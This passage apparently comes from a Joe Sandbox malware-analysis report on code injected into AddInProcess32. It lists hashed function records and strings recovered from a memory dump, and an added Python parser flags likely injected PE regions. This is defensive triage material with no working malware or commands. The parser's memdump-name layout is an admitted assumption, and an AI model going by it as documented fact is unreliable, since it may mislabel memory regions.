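The entries above are the raw output of the Joe Sandbox IDA plugin: one record per function recovered from the memory dump at 01790000 inside AddInProcess32, each with an opcode/instruction ID, a fuzzy hash for cross-sample matching, and (for the last one) the imported API and the format strings it references. The following Python parser is an added example and is not part of the report or of Joe Sandbox; it turns these records into structured data, splits the `$`-joined String ID field, and decodes the dotted memdump file name so the region's protection and type can be checked in triage. The Win32 constant values are the documented `PAGE_*`/`MEM_*` values; the position of the protect, state and type fields inside the `.sdmp` file name is an assumption about the Joe Sandbox naming scheme (the first two fields do line up with the `hcaresult_3_2_...` snapshot name). The sample input is constructed from two of the entries above.

```python
# Added example: parser for Joe Sandbox IDA-plugin function entries.
# Not report code. The memdump file-name field layout in decode_source_file()
# is an ASSUMPTION; PAGE_*/MEM_* values are the standard Win32 constants.
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample input, copied in the layout the report uses above. The second
# entry's strings are IPv4-mapped IPv6 textual forms (::ffff:a.b.c.d, RFC 4291).
SAMPLE_REPORT = """
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: e237b7bb4700b88f39381344c2952f816ef7d957fde6f9a398c868b0c61f2f22
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
• Instruction ID: eadf4d33aa506ee02ddbea93db23a1277edfbe0beddd79811e3bfa6769cd7d63
• Opcode Fuzzy Hash: f5586962a5010e78495e50fd6a6e6a63af9a9068277d5ee73fe85e031d909396
• Instruction Fuzzy Hash: 2A51E3B6A0011EAFCB56DBAC8C9497EFBB9BB483407148229F5A5D7681D374DF4087E0
"""

# Documented Win32 MEMORY_BASIC_INFORMATION values (not assumptions).
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")           # "• Key: value"
SOURCE_RE = re.compile(r"^(\S+?\.sdmp), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)$")


@dataclass
class FunctionEntry:
    source_file: str
    offset: int
    based_on_pe: bool
    snapshot_file: str
    api_id: str
    strings: List[str]          # the report joins several strings with '$'
    opcode_id: str
    instruction_id: str
    opcode_fuzzy_hash: str
    instruction_fuzzy_hash: str


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the report at each 'Memory Dump Source' header and read the bullet fields."""
    entries: List[FunctionEntry] = []
    for chunk in text.split("Memory Dump Source")[1:]:
        fields: Dict[str, str] = {}
        for line in chunk.splitlines():
            m = FIELD_RE.match(line.strip())
            if m:
                fields[m.group(1).strip()] = m.group(2).strip()
        src = SOURCE_RE.match(fields.get("Source File", ""))
        if src is None:
            raise ValueError("entry without a parseable Source File line")
        string_field = fields.get("String ID", "")
        entries.append(FunctionEntry(
            source_file=src.group(1),
            offset=int(src.group(2), 16),
            based_on_pe=src.group(3) == "true",
            snapshot_file=fields.get("Snapshot File", ""),
            api_id=fields.get("API ID", ""),
            strings=string_field.split("$") if string_field else [],
            opcode_id=fields.get("Opcode ID", ""),
            instruction_id=fields.get("Instruction ID", ""),
            opcode_fuzzy_hash=fields.get("Opcode Fuzzy Hash", ""),
            instruction_fuzzy_hash=fields.get("Instruction Fuzzy Hash", ""),
        ))
    return entries


def decode_source_file(name: str) -> Dict[str, object]:
    """ASSUMED layout: <proc index>.<stage>.<dump id>.<base>.<protect>.<state>.<type>.<reserved>.sdmp"""
    parts = name[: -len(".sdmp")].split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected memdump name: {name}")
    proc, stage, _dump_id, base, protect, state, mtype, _reserved = parts
    return {
        "process_index": int(proc),
        "stage": int(stage),
        "base": int(base, 16),
        "protect": PAGE_PROTECT.get(int(protect, 16), hex(int(protect, 16))),
        "state": MEM_STATE.get(int(state, 16), hex(int(state, 16))),
        "type": MEM_TYPE.get(int(mtype, 16), hex(int(mtype, 16))),
    }


def looks_like_injected_pe(entry: FunctionEntry) -> bool:
    """A PE reconstructed from a committed, private, RWX region (rather than a mapped
    image) is the usual footprint of code written into a process by injection."""
    info = decode_source_file(entry.source_file)
    return (entry.based_on_pe and info["protect"] == "PAGE_EXECUTE_READWRITE"
            and info["state"] == "MEM_COMMIT" and info["type"] == "MEM_PRIVATE")
```

Run over the full report text, `parse_entries` gives one record per function; grouping on `opcode_fuzzy_hash` or `instruction_fuzzy_hash` is how the same routine is matched across other samples' reports, and `looks_like_injected_pe` flags dumps that agree with the report's "Injects a PE file into a foreign processes" signature. The `___swprintf_l` record's strings (`::ffff:0:%u.%u.%u.%u` and friends) identify that function as an IPv6/IPv4-mapped address formatter, which helps label the payload's networking code during manual analysis.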

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
• Instruction ID: 3498b9228738425217c17ddb792a1fe779a3d3dde6dc8366aedf354c158f0748
• Opcode Fuzzy Hash: 207f5fb739e35ac2796f43b913887c9e62d50f0b1cd0a79d5e26aff9d6f1fc00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D51E5B5A00646AEDB30DF9CCCD09BFBBFAEB44304B048469F596D7641E674EB808760
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                                                                                        • String ID: +$-$0$0
                                                                                                                                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                        • Instruction ID: 4b671ffe8753e3dd68e70b32d270105e77fa2841b0fc38c0b6a6614a7ee7cd11
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB81BF78E0524D8FEFAA8E6CCC517BEBBB1AF45360F184659D861E72D1C7308B408B51
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                                                                                                                                        • Opcode ID: 9ece24d2c8c59e980115c17350d1d4cfe21c76a34c7e1f139dcb3684496b3149
                                                                                                                                                                                                                                        • Instruction ID: 0778f157bdc0137686ea657434cece981092ad59ee27ca6b40aa3bb74628418e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9ece24d2c8c59e980115c17350d1d4cfe21c76a34c7e1f139dcb3684496b3149
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8821517AA00559ABDB11DE6DDC40AEEBBF9FF54754F040116EA45E3240E730EB418BA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018302E7
                                                                                                                                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018302BD
                                                                                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 0183031E
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                                                                        • API String ID: 0-2474120054
                                                                                                                                                                                                                                        • Opcode ID: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                                                                                                                                                                                        • Instruction ID: c747c490d9f7ef52519a5cd31034671efdac40bce8d8fdcd06837716e7074df2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d97f62573b26a23f58f7fd30d02a7e9f83777ea8f435cfe9fff84cdf7db6e85
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59E18E706087419FE725CF2CC888B2ABBE1BB88314F140A6DF5A5CB6D1D774DA45CB82
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0183728C
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • RTL: Resource at %p, xrefs: 018372A3
                                                                                                                                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01837294
                                                                                                                                                                                                                                        • RTL: Re-Waiting, xrefs: 018372C1
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                                                                                                                                        • Opcode ID: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                                                                                                                                                                                        • Instruction ID: ed92fbb63dfa0e1ed2f6179fa0a8805a4b7ab8e7428eeff3cb33e154d2dbd4c7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d21be346cb0d5bd6028d87543d7bc1121aad43e4f293f2fc3c9c2c8a904e2bd8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7410072700206ABD721DE29CC41F6AB7A5FB94710F14061DFA56EB380DB21FA468BD2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                                                                                                                                        • Opcode ID: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                                                                                                                                                                                        • Instruction ID: 35c947a2649003a344cb862fef56bce6aa2d2297e2fba8e1e628adc2669ff9cd
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6da0b573c8b91f187500dc9706b1cad7a506272a92995794456a39ec028d961c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 41315072A002199FDB20DE2DDC40BEEB7F9EB54710F44455AE949E3250EB30EB448BA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$@
                                                                                                                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                                                                                                                        • Opcode ID: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                                                                                                                                                                                        • Instruction ID: 94ef4ab80c571b81d2e48de43f003d9d22f7b8394cc85481a43384fc3cd0289a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c9ea28a2027f3adc3c6028c8dc1c28b93365ae6956847dcb602f98879cb70c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A811D72D002699BDB72CB54CC45BEEB7B5AB48714F0041DAEA19B7240E7705F84CFA0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0184CFBD
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallFilterFunc@8
                                                                                                                                                                                                                                        • String ID: @$@4Qw@4Qw
                                                                                                                                                                                                                                        • API String ID: 4062629308-2383119779
                                                                                                                                                                                                                                        • Opcode ID: f7818dd7c472d5b5484b7bbed327eeea9ea021ce13997e3f73224f9ddb4369b8
                                                                                                                                                                                                                                        • Instruction ID: fcbebb543278ceb88b9c641b7c23b5a68c9430ba5134be6504a2cd7388a034e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7818dd7c472d5b5484b7bbed327eeea9ea021ce13997e3f73224f9ddb4369b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68419F71900219DFDB21DFA9C880AADFBB8FF64B40F10412AE915DB354DB749A01CB65